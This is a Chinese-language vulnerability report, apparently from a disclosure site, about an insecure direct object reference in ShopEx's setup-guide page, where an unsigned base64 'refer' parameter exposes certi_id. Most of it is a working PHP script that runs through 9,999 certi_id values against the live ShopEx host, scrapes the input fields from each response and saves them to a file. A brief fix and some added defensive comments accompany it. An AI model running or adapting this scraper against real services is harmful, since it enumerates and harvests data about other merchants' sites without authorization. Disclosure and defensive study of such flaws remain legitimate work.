简要描述:
ShopEx某接口缺陷,可遍历所有网站
详细说明:
问题出现在 ShopEx 网店使用向导页面

http://guide.ecos.shopex.cn/step ... WlkaWFuLmNvbVwvIn0=
refer base64解密为 {"certi_id":'1051',"callback_url":"http:\/\/www.joyogame.net\/"}

我们修改 certi_id 即可遍历所有使用了 ShopEx 程序的网站
<?php
// Proof-of-concept from the report: walks certi_id values 1..9999 and, for each,
// asks the ShopEx guide endpoint to render step2 for that id.
// Security note: the server trusts certi_id straight out of a client-supplied,
// unsigned base64 blob, so any caller can choose any id (an IDOR). The fix
// belongs on the server side — derive the id from the authenticated session,
// or sign the refer token and reject any mismatch. Detection: one client
// requesting step2.php with many sequential certi_id values in a short window.

for ($i=1; $i < 10000; $i++) { // enumerate certi_id values
    ShowshopExD($i);
}

// Fetches step2.php for one certi_id and, when the response contains the refer
// value, echoes every <input type="text"> name:value pair from it and appends
// the same lines to a file.
// @param int|string $cid certi_id to request; cast with intval() below
function ShowshopExD($cid) {
    $url='http://guide.ecos.shopex.cn/step2.php';
    // Same JSON shape as the refer in the report; only certi_id is varied.
    $refer = base64_encode('{"certi_id":'.intval($cid).',"callback_url":"http:\/\/www.a.com\/"}');
    $url = $url.'?refer='.$refer;
    $ch = curl_init($url);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true) ;
    curl_setopt($ch, CURLOPT_BINARYTRANSFER, true) ;
    $result = curl_exec($ch);
    // NOTE: curl_exec() returns false on failure; that is not checked here, so
    // the conversion below then effectively sees an empty string.
    $result = mb_convert_encoding($result, "gb2312", "UTF-8");
    // The response echoing the refer value is used as the "hit" signal.
    // NOTE: strpos() returns 0 for a match at offset 0, which this truthiness
    // test treats as no match — `!== false` is the usual form.
    if(strpos($result,$refer))
    {
        $fp = fopen("c:/shopEx.txt",'ab'); // append results to a file (return value unchecked)
        preg_match_all('/<input\stype="text"(.*?)\/>/',$result,$value);
        foreach ($value[1] as $key) {
            // Pull the first name="..." / value="..." pair out of each input tag;
            // $res[1][0] / $res[3][0] are undefined if the pattern does not match.
            preg_match_all('/name="(.*?)"(.*?)value="(.*?)"/',trim($key),$res);
            echo $res[1][0].':'.$res[3][0]."\r\n";
            $col =$res[1][0].':'.$res[3][0]."\r\n";
            fwrite($fp, $col, strlen($col));
        }
        echo '--------------------------------'."\r\n";
        fclose($fp);
    }
    flush();
    curl_close($ch);
}
?>
漏洞证明:
http://www.myhack58.com/Article/UploadPic/2013-9/201392110502740490.jpg
修复建议:refer 换成其他加密方式